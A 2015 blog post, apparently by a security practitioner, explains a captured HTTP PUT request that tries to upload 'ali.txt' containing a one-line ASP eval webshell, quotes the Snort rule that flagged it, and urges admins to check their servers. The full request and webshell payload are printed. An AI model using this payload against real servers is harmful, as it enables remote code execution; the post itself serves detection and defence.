Friday, March 13, 2015

ASP Injection Attempt ali.txt Explained

I posted the basic details here but I wanted to go into more detail.

PUT /ali.txt HTTP/1.1
Accept: application/json
Content-Type: application/json
Content-Length: 39
Expect: 100-continue
Connection: Keep-Alive

alihack<%eval request("")%>

So it's been around for a while, you may have seen the requests, but what are they trying to do?

1.) First evil IP ( sends the attack request. It's difficult to tell without further research if this is truly a bad guy's server or just a good guy's server that was compromised and is now being used to launch attacks for the attacker

2.) Second an IDS (Intrusion detected system) is sitting in front of the web server watching requests come in and firing off Snort rules. It triggered on this one because the url contained '/ali.txt' in it and it was a PUT http request.

MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt (1:32875)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt"; flow:to_server,established; content:"/ali.txt"; http_uri; urilen:8; content:"PUT"; http_method; metadata:impact_flag red, service http; reference:url,; classtype:misc-activity; sid:32875; rev:1; )

3.) Third If the web server has HTTP PUT enabled (which is pretty much unheard of nowadays on the Internet) then you have a major problem because that means anybody in the world can upload any file they want to your server by running the PUT command.

PUT /ali.txt

4.) Fourth and finally if the attack successfully uploads the 'ali.txt' file then the file will contain the old school ASP script below so that when the attacker makes a call-back to your website/ali.txt and pass a parameter called "" the code in that parameter will get eval'd or executed on that server.  This is essentially a webshell for ASP.  So check your web server, if you see ali.txt you know you've got issues and need to fix them.

alihack<%eval request("")%>

The requests may look something like this where EVILCODE is something the attacker is trying to run.

Lock those servers down!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

revised: 2/1/2018 not php but asp, webshell not just a test file